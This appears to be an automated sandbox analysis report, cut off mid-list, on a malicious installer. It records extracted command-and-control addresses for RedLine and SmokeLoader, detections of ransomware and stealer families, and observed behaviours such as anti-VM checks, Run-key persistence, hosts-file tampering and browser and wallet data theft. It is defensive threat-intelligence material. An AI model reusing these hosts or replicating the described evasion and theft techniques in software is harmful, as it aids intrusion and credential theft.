Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
1395s -
max time network
2231s -
platform
windows10_x64 -
resource
win10-de -
submitted
16-09-2021 21:08
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
6.5MB
-
MD5
064f0d6900675bed580da1291a566cfa
-
SHA1
f81699a68c901d190842de735dbda28a3fb52292
-
SHA256
7ec88d4baa0a97362a026cf6e0f46422379a99be6d9bfe19034152f3d47cc0ed
-
SHA512
41dc5c444afd6b5dc0947cf9950acb5aa1081ee9921c748195325b5cfcb23532cea1802959baa59a0c41ed998ba20b509ec107da882d5d8b3bf0b1d17f892738
Malware Config
Extracted
redline
medianew
91.121.67.60:62102
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
ANI
45.142.215.47:27643
Extracted
metasploit
windows/single_exec
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral9/memory/1044-400-0x00000000017C0000-0x00000000020DE000-memory.dmp family_glupteba behavioral9/memory/1044-401-0x0000000000400000-0x0000000000D39000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2384 4040 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5540 4040 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 13444 4040 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 18312 4040 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral9/memory/640-288-0x000000000041C5D6-mapping.dmp family_redline behavioral9/memory/640-285-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral9/memory/2364-326-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral9/memory/2364-327-0x000000000041C5CA-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203b503b429e68.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203b503b429e68.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 5092 created 896 5092 WerFault.exe setup.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 14432 created 11012 14432 svchost.exe OneDriveSetup.exe PID 14432 created 1044 14432 svchost.exe LzmwAqmV.exe PID 14432 created 7892 14432 svchost.exe 59vTTgxQkNQc5rmC6nQhRefv.exe PID 14432 created 9608 14432 svchost.exe kvXppC1RJ_LmP970tG_k_8kU.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS833B3CA0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS833B3CA0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS833B3CA0\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 54 IoCs
Processes:
powershell.execmd.execmd.exeWMIC.exerundll32.exeMsiExec.exeflow pid process 384 9184 powershell.exe 459 4752 cmd.exe 460 4752 cmd.exe 562 7528 cmd.exe 686 7728 WMIC.exe 902 8960 rundll32.exe 905 6840 MsiExec.exe 907 6840 MsiExec.exe 909 6840 MsiExec.exe 911 6840 MsiExec.exe 915 6840 MsiExec.exe 916 6840 MsiExec.exe 917 6840 MsiExec.exe 918 6840 MsiExec.exe 919 6840 MsiExec.exe 920 6840 MsiExec.exe 921 6840 MsiExec.exe 922 6840 MsiExec.exe 926 6840 MsiExec.exe 927 6840 MsiExec.exe 931 6840 MsiExec.exe 932 6840 MsiExec.exe 934 6840 MsiExec.exe 935 6840 MsiExec.exe 936 6840 MsiExec.exe 940 6840 MsiExec.exe 942 6840 MsiExec.exe 949 6840 MsiExec.exe 951 6840 MsiExec.exe 952 6840 MsiExec.exe 953 6840 MsiExec.exe 954 6840 MsiExec.exe 955 6840 MsiExec.exe 956 6840 MsiExec.exe 957 6840 MsiExec.exe 958 6840 MsiExec.exe 960 6840 MsiExec.exe 961 6840 MsiExec.exe 962 6840 MsiExec.exe 963 6840 MsiExec.exe 964 6840 MsiExec.exe 965 6840 MsiExec.exe 966 6840 MsiExec.exe 967 6840 MsiExec.exe 968 6840 MsiExec.exe 969 6840 MsiExec.exe 970 6840 MsiExec.exe 971 6840 MsiExec.exe 972 6840 MsiExec.exe 973 6840 MsiExec.exe 974 6840 MsiExec.exe 975 6840 MsiExec.exe 976 6840 MsiExec.exe 977 6840 MsiExec.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
Chmenka.exe___YHDG34.execmd.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Chmenka.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ___YHDG34.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeThu20dae7c52bc0856.exeThu20f2cf5e0c.exeThu20c467678e2c.exeThu2026c04e7218e1.exeThu20a5f7ccaa78.exeThu2025d6674aed72ba.exeThu20bc9ea26f.exeThu2094524d5e5b.exeThu2026c04e7218e1.tmpThu203b503b429e68.exeThu2090b5515d63b2.exeThu20fdd9ac35a68.exeThu203cdb52ef3c6580d.exe8684174.scrChrome 5.exePublicDwlBrowser1100.exeWerFault.exe___YHDG34.exesetup.exeBearVpn 3.exe4873306.exeThu20a5f7ccaa78.exeThu203cdb52ef3c6580d.exeLzmwAqmV.exeThu20a5f7ccaa78.exe6650495.exeultramediaburner.exeGysafaemura.exeultramediaburner.tmpQuvovaekaky.exeUltraMediaBurner.exe8337894.scr5581443.scrGcleanerEU.exeservices64.exeanyname.exeinstaller.exegcleaner.exe72HVEuHc1LiCdlGyE_KhQi1n.exeXBR5d0OipcZIAALv0Ds4mA_b.exe0IuDRAJglDutmXwQOEhSBXDa.exea3nSYK3QiDj60t0XJFF7UlrQ.exeGn9Jky4_EDbOI58YpznCytCC.exe_zmz9h_0oO1LiMAufsS4G9Hx.exetH0ctc2jiXFQrqD_hc1dkUzk.exe3j37Icfa8ZkdKtGcGgFo5hHI.exe1LmD_gnw4q8R9TJXTApySnvK.execmd.exeWMIADAP.EXEnRYNXU8kXWDM9ct7FinhQA1L.exerePWGAeA9gG8Y413QzXTBROs.exemG10dmTajtqdi6FuJgXzFaN5.exeq8G7pt2bO5fMdxqZP9uX1JCU.exeEWtGNadfMrzbtpsBi9aWUtQT.exeusyw5ZngVKxU1DoBnfAsyAxL.exedX9c0VLsY6QZmDeHO24bcfz5.exeXgjnLxbzwVfuidtVtZ1khfTK.exeItAFNrv2sOXUt7aWaBN3nK6S.exeyT0Jr6qhYrzdROOogtndOL8l.exewVv8AImVlR_dbDz6BgqJ11oz.exeRukWAObiV_pk8jgtTfDBZo9L.exekgFoGuhcdrrxNuBNV0pnzt35.exepid process 4920 setup_installer.exe 5032 setup_install.exe 312 Thu20dae7c52bc0856.exe 3048 Thu20f2cf5e0c.exe 3972 Thu20c467678e2c.exe 4132 Thu2026c04e7218e1.exe 420 Thu20a5f7ccaa78.exe 1788 Thu2025d6674aed72ba.exe 2216 Thu20bc9ea26f.exe 4404 Thu2094524d5e5b.exe 4508 Thu2026c04e7218e1.tmp 4512 Thu203b503b429e68.exe 4564 Thu2090b5515d63b2.exe 3224 Thu20fdd9ac35a68.exe 4700 Thu203cdb52ef3c6580d.exe 4956 8684174.scr 4104 Chrome 5.exe 3844 PublicDwlBrowser1100.exe 4372 WerFault.exe 4944 ___YHDG34.exe 896 setup.exe 1352 BearVpn 3.exe 3860 4873306.exe 524 Thu20a5f7ccaa78.exe 640 Thu203cdb52ef3c6580d.exe 1044 LzmwAqmV.exe 2364 Thu20a5f7ccaa78.exe 1872 6650495.exe 5284 ultramediaburner.exe 5336 Gysafaemura.exe 5448 ultramediaburner.tmp 5456 Quvovaekaky.exe 5772 UltraMediaBurner.exe 6136 8337894.scr 1968 5581443.scr 6684 GcleanerEU.exe 7004 services64.exe 7140 anyname.exe 6148 installer.exe 6152 gcleaner.exe 3924 72HVEuHc1LiCdlGyE_KhQi1n.exe 7252 XBR5d0OipcZIAALv0Ds4mA_b.exe 7288 0IuDRAJglDutmXwQOEhSBXDa.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7316 Gn9Jky4_EDbOI58YpznCytCC.exe 7388 _zmz9h_0oO1LiMAufsS4G9Hx.exe 7408 tH0ctc2jiXFQrqD_hc1dkUzk.exe 7452 3j37Icfa8ZkdKtGcGgFo5hHI.exe 7508 1LmD_gnw4q8R9TJXTApySnvK.exe 7528 cmd.exe 7540 WMIADAP.EXE 7552 nRYNXU8kXWDM9ct7FinhQA1L.exe 7560 rePWGAeA9gG8Y413QzXTBROs.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7576 q8G7pt2bO5fMdxqZP9uX1JCU.exe 7584 EWtGNadfMrzbtpsBi9aWUtQT.exe 7708 usyw5ZngVKxU1DoBnfAsyAxL.exe 7816 dX9c0VLsY6QZmDeHO24bcfz5.exe 7832 XgjnLxbzwVfuidtVtZ1khfTK.exe 7840 ItAFNrv2sOXUt7aWaBN3nK6S.exe 7848 yT0Jr6qhYrzdROOogtndOL8l.exe 7856 wVv8AImVlR_dbDz6BgqJ11oz.exe 7864 RukWAObiV_pk8jgtTfDBZo9L.exe 7872 kgFoGuhcdrrxNuBNV0pnzt35.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20dae7c52bc0856.exe vmprotect behavioral9/memory/312-190-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20dae7c52bc0856.exe vmprotect -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
rePWGAeA9gG8Y413QzXTBROs.exe6650495.exe_zmz9h_0oO1LiMAufsS4G9Hx.exejtW2SlgNdt8N1bR8cmz07mY3.exeC3F8.exerundll32.exeAA61.exe3j37Icfa8ZkdKtGcGgFo5hHI.exewwi.exeBF24.exewwl.exeAYcoRdCUFo3EVft6taKBoNmp.exeInstall.exe5581443.scrEWtGNadfMrzbtpsBi9aWUtQT.exe8626517.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rePWGAeA9gG8Y413QzXTBROs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6650495.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _zmz9h_0oO1LiMAufsS4G9Hx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jtW2SlgNdt8N1bR8cmz07mY3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C3F8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _zmz9h_0oO1LiMAufsS4G9Hx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rePWGAeA9gG8Y413QzXTBROs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AA61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C3F8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6650495.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3j37Icfa8ZkdKtGcGgFo5hHI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wwi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wwi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BF24.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3j37Icfa8ZkdKtGcGgFo5hHI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wwl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AYcoRdCUFo3EVft6taKBoNmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5581443.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EWtGNadfMrzbtpsBi9aWUtQT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jtW2SlgNdt8N1bR8cmz07mY3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wwl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AA61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BF24.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8626517.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5581443.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EWtGNadfMrzbtpsBi9aWUtQT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AYcoRdCUFo3EVft6taKBoNmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8626517.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Thu2094524d5e5b.exeqT3dWYBP7ZsuOrwW4ZcUbjl6.exeWesefesikae.exegCRvjRb.exeUSNydSz.exeGysafaemura.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Thu2094524d5e5b.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation qT3dWYBP7ZsuOrwW4ZcUbjl6.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Wesefesikae.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation gCRvjRb.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation USNydSz.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Gysafaemura.exe -
Drops startup file 1 IoCs
Processes:
SQWM6AN8HIEEB4JT.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoruning.ini.lnk SQWM6AN8HIEEB4JT.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeThu2026c04e7218e1.tmprundll32.exeinstaller.exeMsiExec.exerundll32.exeRukWAObiV_pk8jgtTfDBZo9L.exe_zmz9h_0oO1LiMAufsS4G9Hx.exerundll32.exeMsiExec.exenRYNXU8kXWDM9ct7FinhQA1L.exe30m_VqBd5yyKL_Q269RMiiX0.exe818D.exeforfiles.exeD2B.exerundll32.execlient32.exebuild2.exerundll32.exerundll32.exerundll32.exeMsiExec.exepid process 5032 setup_install.exe 5032 setup_install.exe 5032 setup_install.exe 5032 setup_install.exe 5032 setup_install.exe 4508 Thu2026c04e7218e1.tmp 1828 rundll32.exe 6148 installer.exe 6148 installer.exe 6148 installer.exe 6900 MsiExec.exe 6900 MsiExec.exe 6908 rundll32.exe 7864 RukWAObiV_pk8jgtTfDBZo9L.exe 7388 _zmz9h_0oO1LiMAufsS4G9Hx.exe 7388 _zmz9h_0oO1LiMAufsS4G9Hx.exe 7388 _zmz9h_0oO1LiMAufsS4G9Hx.exe 7388 _zmz9h_0oO1LiMAufsS4G9Hx.exe 7388 _zmz9h_0oO1LiMAufsS4G9Hx.exe 9432 rundll32.exe 6840 MsiExec.exe 6840 MsiExec.exe 6840 MsiExec.exe 6840 MsiExec.exe 6840 MsiExec.exe 6840 MsiExec.exe 6840 MsiExec.exe 7552 nRYNXU8kXWDM9ct7FinhQA1L.exe 7552 nRYNXU8kXWDM9ct7FinhQA1L.exe 4088 30m_VqBd5yyKL_Q269RMiiX0.exe 4088 30m_VqBd5yyKL_Q269RMiiX0.exe 8560 818D.exe 11204 forfiles.exe 8560 818D.exe 8560 818D.exe 8560 818D.exe 8560 818D.exe 6584 D2B.exe 6584 D2B.exe 1148 rundll32.exe 10936 client32.exe 10936 client32.exe 10936 client32.exe 10936 client32.exe 10936 client32.exe 10936 client32.exe 10840 build2.exe 10840 build2.exe 15972 rundll32.exe 18188 rundll32.exe 8960 rundll32.exe 6840 MsiExec.exe 6840 MsiExec.exe 6840 MsiExec.exe 6148 installer.exe 6840 MsiExec.exe 6840 MsiExec.exe 60 MsiExec.exe 60 MsiExec.exe 60 MsiExec.exe 60 MsiExec.exe 60 MsiExec.exe 60 MsiExec.exe 60 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
___YHDG34.exe68D4.exe1515.exeChmenka.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Qynuloqulae.exe\"" ___YHDG34.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\ppsrzufm = "\"C:\\Users\\Admin\\oamuufuc.exe\"" 68D4.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\bca106d2-155a-4288-a1bc-2ca8798ce8c3\\1515.exe\" --AutoStart" 1515.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Company\\Dohetishesi.exe\"" Chmenka.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
3j37Icfa8ZkdKtGcGgFo5hHI.exewwi.exe5581443.scrmd8_8eus.exeC3F8.exewwl.exeEWtGNadfMrzbtpsBi9aWUtQT.exeAYcoRdCUFo3EVft6taKBoNmp.exeBF24.exe8626517.exe6650495.exerePWGAeA9gG8Y413QzXTBROs.exejtW2SlgNdt8N1bR8cmz07mY3.exeAA61.exe_zmz9h_0oO1LiMAufsS4G9Hx.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3j37Icfa8ZkdKtGcGgFo5hHI.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wwi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5581443.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C3F8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wwl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EWtGNadfMrzbtpsBi9aWUtQT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AYcoRdCUFo3EVft6taKBoNmp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BF24.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8626517.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6650495.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rePWGAeA9gG8Y413QzXTBROs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jtW2SlgNdt8N1bR8cmz07mY3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AA61.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _zmz9h_0oO1LiMAufsS4G9Hx.exe -
Drops Chrome extension 3 IoCs
Processes:
gCRvjRb.exeUSNydSz.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json gCRvjRb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json USNydSz.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json gCRvjRb.exe -
Drops desktop.ini file(s) 3 IoCs
Processes:
IDownload.App.exegCRvjRb.exedescription ioc process File opened for modification C:\Windows\assembly\Desktop.ini IDownload.App.exe File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini gCRvjRb.exe File created C:\Windows\assembly\Desktop.ini IDownload.App.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exedescription ioc process File opened (read-only) \??\B: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 431 ipinfo.io 698 api.2ip.ua 5 ip-api.com 66 ipinfo.io 67 ipinfo.io 277 ipinfo.io 386 api.2ip.ua 97 ip-api.com 276 ipinfo.io 388 api.2ip.ua 432 ipinfo.io 699 api.2ip.ua -
Drops file in System32 directory 64 IoCs
Processes:
svchost.exesvchost.exegCRvjRb.exepowershell.exepowershell.exeWerFault.exepowershell.exepowershell.exeCNvEnVd.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent F385CA0FFEB0D022 svchost.exe File opened for modification C:\Windows\System32\Tasks\bEwGusBEGbIeKSSfjR svchost.exe File opened for modification C:\Windows\System32\Tasks\gnDJSXBbE svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\Tasks\gydHPhxEz svchost.exe File opened for modification C:\Windows\System32\ntdll.pdb WerFault.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90} svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification 